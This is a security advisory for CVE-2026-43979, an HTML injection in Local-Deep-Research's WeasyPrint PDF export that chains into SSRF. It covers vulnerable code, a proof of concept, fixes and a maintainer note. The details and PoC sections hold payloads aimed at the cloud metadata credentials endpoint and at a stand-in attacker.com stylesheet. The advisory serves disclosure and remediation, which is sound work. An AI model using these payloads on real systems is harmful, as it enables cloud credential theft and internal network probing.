PT-2026-39893 · PyPI · Local-Deep-Research

Published: 2026-05-11 · Updated: 2026-05-11 · CVE-2026-43979

CVSS v3.1: 5.0 (Medium) · Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Summary

PDFService._markdown_to_html() constructs an HTML document by interpolating user-controlled values directly into an f-string without any HTML escaping. The affected values are title (sourced from research.title or research.query) and the metadata key-value pairs. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document that WeasyPrint processes during PDF export. This injection can be chained to trigger Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in ssrf_validator.py.

Details

Vulnerable code: src/local_deep_research/web/services/pdf_service.py, lines 171–176
# pdf_service.py:171-176
if title:
  html_parts.append(f"<title>{title}</title>")  # ← title is not escaped

if metadata:
  for key, value in metadata.items():
    html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped
Data flow trace:
User input: research.query
    │
    ▼
research_routes.py:1321
 pdf_title = research.title or research.query
    │
    ▼
research_routes.py:1325-1326
 export_report_to_memory(report_content, format, title=pdf_title)
    │
    ▼
pdf_service.py:107
 PDFService.markdown_to_pdf(markdown_content, title=pdf_title)
    │
    ▼
pdf_service.py:137
 _markdown_to_html(markdown_content, title, metadata)
    │
    ▼
pdf_service.py:172
 f"<title>{title}</title>"  ← injection point, no escaping
    │
    ▼
pdf_service.py:112
 HTML(string=html_content)  ← WeasyPrint renders the injected HTML
research.query is a string submitted by the user via POST /api/start_research, stored as-is in the database, and retrieved without any sanitization. When the user triggers POST /api/v1/research/<research_id>/export/pdf, this value is embedded unescaped into the HTML document processed by WeasyPrint.
Injection point 1: <title> tag breakout
Input:  </title><img src="http://169.254.169.254/latest/meta-data/" />
Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title>
By default, when WeasyPrint encounters the injected <img> tag, it issues an HTTP GET request to the URL in src.
Injection point 2: <meta> attribute breakout
Input:  " /><link rel="stylesheet" href="http://attacker.com/evil.css
Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css">
WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF.
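Both breakouts can be reproduced without running the application. The following is a minimal sketch that mimics the interpolation pattern reported above; build_head_unescaped and the "author" metadata key are hypothetical names chosen for illustration, not the project's code.

```python
def build_head_unescaped(title, metadata=None):
    """Mimic the reported pattern: values are placed into the markup verbatim."""
    parts = ['<meta charset="utf-8">']
    if title:
        parts.append(f"<title>{title}</title>")
    for key, value in (metadata or {}).items():
        parts.append(f'<meta name="{key}" content="{value}">')
    return "\n".join(parts)


# Payloads taken from the two injection points described in the report.
title_payload = '</title><img src="http://169.254.169.254/latest/meta-data/" />'
meta_payload = '" /><link rel="stylesheet" href="http://attacker.com/evil.css'

# "author" is an arbitrary, assumed metadata key.
head = build_head_unescaped(title_payload, {"author": meta_payload})
print(head)
```

The printed markup contains a standalone <img> element and a standalone <link> element, neither of which was present in the template.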

Proof of Concept

Step 1: Log in and submit a research query containing the injection payload
POST /api/start_research HTTP/1.1
Host: localhost:5000
Content-Type: application/json
Cookie: session=<valid session>

{
 "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>",
 "mode": "quick",
 "model_provider": "OLLAMA",
 "model": "llama3"
}
The response returns a research_id, e.g. "aaaa-bbbb-cccc-dddd".
Step 2: After the research completes, trigger PDF export
POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1
Host: localhost:5000
Cookie: session=<valid session>
X-CSRFToken: <csrf token>
Step 3: Intermediate HTML constructed server-side
<!DOCTYPE html><html><head>
<meta charset="utf-8">
<title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title>
</head><body>
...report content...
</body></html>
Step 4: WeasyPrint issues an outbound HTTP request to the injected URL
Observed in network monitoring (e.g. tcpdump) or in the logs of the targeted internal service:
GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: 169.254.169.254
User-Agent: WeasyPrint/...
Lightweight verification (no SSRF environment required):
Set the query to:
</title><title>INJECTED
The resulting HTML will contain two <title> tags and the PDF document metadata title will read INJECTED, confirming successful injection.
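The same check can be approximated offline against the intermediate HTML. The sketch below uses only Python's standard html.parser module to count <title> start tags and to list the URLs a renderer might try to fetch; InjectionProbe and probe are illustrative names and are not part of the project.

```python
from html.parser import HTMLParser


class InjectionProbe(HTMLParser):
    """Count <title> start tags and collect <img src> / <link href> URLs."""

    def __init__(self):
        super().__init__()
        self.title_count = 0
        self.resource_urls = []

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if tag == "title":
            self.title_count += 1
        elif tag == "img" and attributes.get("src"):
            self.resource_urls.append(attributes["src"])
        elif tag == "link" and attributes.get("href"):
            self.resource_urls.append(attributes["href"])


def probe(html_text):
    """Return (number of <title> start tags, list of resource URLs)."""
    parser = InjectionProbe()
    parser.feed(html_text)
    parser.close()
    return parser.title_count, parser.resource_urls


query = "</title><title>INJECTED"
print(probe(f"<title>{query}</title>"))
```

A title count above one, or any URL in the returned list, indicates that the query text was interpreted as markup rather than as text.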

Impact

1. Chained SSRF (High Severity)

By injecting <img src>, <link href>, or <style>@import url() constructs that point to internal addresses, an attacker causes WeasyPrint to issue HTTP requests on behalf of the server during PDF generation. This allows access to:
  • Cloud metadata services (169.254.169.254) on AWS, GCP, or Azure — enabling theft of IAM credentials and instance identity documents.
  • Internal network services (192.168.x.x, 10.x.x.x) — enabling reconnaissance and interaction with internal APIs not exposed to the internet.
  • Localhost administrative interfaces — if SSRF protections are only applied at the user-input validation layer.
This is an effective bypass of the application's existing SSRF defenses in ssrf_validator.py, because WeasyPrint's outbound resource requests are never routed through that validator.

2. HTML Document Structure Corruption

Injected tags can prematurely close <head> and insert arbitrary content into <body>, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality.

3. CSS Injection (Medium Severity)

By injecting <link> or <style> tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing.

4. Affected Scope

  • All PDF export operations are affected.
  • The vulnerability is reachable by any authenticated user — no elevated privileges required.
  • Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability.

Remediation

Apply html.escape() to all user-controlled values before embedding them in the HTML template inside _markdown_to_html:
import html

if title:
  html_parts.append(f"<title>{html.escape(title)}</title>")

if metadata:
  for key, value in metadata.items():
    html_parts.append(
      f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
    )
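A regression check for the escaping approach can be sketched with the standard library alone. build_head_escaped below is a hypothetical stand-in for the patched template code, and the payload list reuses the strings from this report; the project's actual tests may look different.

```python
import html


def build_head_escaped(title, metadata=None):
    """Hypothetical stand-in for the patched template: every value is escaped."""
    parts = ['<meta charset="utf-8">']
    if title:
        parts.append(f"<title>{html.escape(title)}</title>")
    for key, value in (metadata or {}).items():
        parts.append(
            f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">'
        )
    return "\n".join(parts)


PAYLOADS = [
    '</title><img src="http://169.254.169.254/latest/meta-data/" />',
    '" /><link rel="stylesheet" href="http://attacker.com/evil.css',
    "</title><title>INJECTED",
]


def check_payload(payload):
    """Return True when the payload stays inert in both the title and meta sinks."""
    head = build_head_escaped(payload, {payload: payload})
    no_new_tags = "<img" not in head and "<link" not in head
    single_title = head.count("<title>") == 1
    return no_new_tags and single_title


print(all(check_payload(p) for p in PAYLOADS))
```

html.escape() converts double and single quotes by default (quote=True), which is what keeps the attribute-breakout payload inside the content value.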
Additionally, consider configuring WeasyPrint with a custom url_fetcher that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately embedded external resources:
import weasyprint
from weasyprint import HTML

def safe_url_fetcher(url, timeout=10):
  from ssrf_validator import validate_url
  if not validate_url(url):
    raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}")
  return weasyprint.default_url_fetcher(url, timeout=timeout)

html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher)
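The report does not show what validate_url checks. As a rough illustration only, the kind of decision such a validator has to make can be sketched with the standard library: reject non-http(s) schemes and any host that is, or resolves to, a loopback, private, or link-local address. is_url_allowed and its helpers are hypothetical names and do not reflect the project's ssrf_validator module.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def _resolve(host):
    """Return every IP address string the host name resolves to."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def _is_internal(address):
    """Classify one IP address string as internal (True) or public (False)."""
    addr = ipaddress.ip_address(address.split("%")[0])  # drop any IPv6 scope id
    # Unwrap IPv4-mapped IPv6 (e.g. ::ffff:127.0.0.1) before classifying.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def is_url_allowed(url, resolve=_resolve):
    """Hypothetical check: http(s) only, and no internal address behind the host."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not host:
        return False
    try:
        addresses = [str(ipaddress.ip_address(host))]  # host is an IP literal
    except ValueError:
        try:
            addresses = resolve(host)  # host is a name: check what it resolves to
        except OSError:
            return False
    return bool(addresses) and not any(_is_internal(a) for a in addresses)


print(is_url_allowed("http://169.254.169.254/latest/meta-data/"))
```

A check of this kind validates the address at lookup time only; if the fetcher resolves the name again later, the answer may differ, so a production validator usually needs to pin the resolved address or re-check on connect.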

Report generated against commit f3540fb3 — local-deep-research, branch main.

Maintainer note (2026-04-24)

Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to main:
#3082 (merged 2026-03-29, shipped in v1.5.0+) — closes the HTML-injection sinks:
  • html.escape() now wraps the title value in <title>…</title>
  • Same for metadata keys/values in <meta name="…" content="…">
  • Regression tests added in tests/web/services/test_pdf_service.py
#3613 (merged 2026-04-24, shipped in v1.6.0) — implements the url_fetcher recommendation from the Remediation section:
  • New safe_url_fetcher in pdf_service.py delegates to weasyprint.default_url_fetcher only after security.ssrf_validator.validate_url accepts the URL
  • Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes
  • Covers the chained SSRF path through any URL reaching the rendered HTML — markdown body, citations, raw-HTML passthrough via Python-Markdown
  • Blocked URLs raise UnsafePDFResourceURLError (a ValueError subclass) so WeasyPrint skips the resource and the render continues
  • 8 regression tests, including an end-to-end render with <img src="http://169.254.169.254/…"> embedded in the body
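The validate-then-delegate pattern described in these bullets can be sketched independently of WeasyPrint. In the snippet below, UnsafeResourceURLError, make_guarded_fetcher, and both callables passed to it are hypothetical stand-ins; the merged code in pdf_service.py is not reproduced here and may differ.

```python
class UnsafeResourceURLError(ValueError):
    """Hypothetical analogue of the ValueError subclass named in the note."""


def make_guarded_fetcher(is_allowed, delegate):
    """Wrap a fetcher so it only runs for URLs that the validator accepts."""

    def guarded_fetch(url, *args, **kwargs):
        if not is_allowed(url):
            raise UnsafeResourceURLError(
                f"Blocked unsafe URL in PDF rendering: {url}"
            )
        return delegate(url, *args, **kwargs)

    return guarded_fetch


# Stub validator and stub fetcher, used here only to show the control flow.
fetched = []


def stub_delegate(url, timeout=10):
    fetched.append(url)
    return {"string": b"", "mime_type": "text/css"}


fetch = make_guarded_fetcher(
    lambda url: url.startswith("https://example.org/"), stub_delegate
)
fetch("https://example.org/style.css")
try:
    fetch("http://169.254.169.254/latest/meta-data/")
except ValueError as exc:
    print(type(exc).__name__, exc)
```

Subclassing ValueError keeps the error catchable by any caller that already handles ValueError, while still letting tests assert on the more specific type.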
Advisory metadata: CVSS CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0 Moderate), CWEs CWE-79 + CWE-918. Patched in v1.6.0 — upgrade to v1.6.0 or later to receive both fixes.

Fix

SSRF

XSS

Weakness Enumeration

Related Identifiers

CVE-2026-43979
GHSA-FJ2M-QVH9-JQ4Q

Affected Products

Local-Deep-Research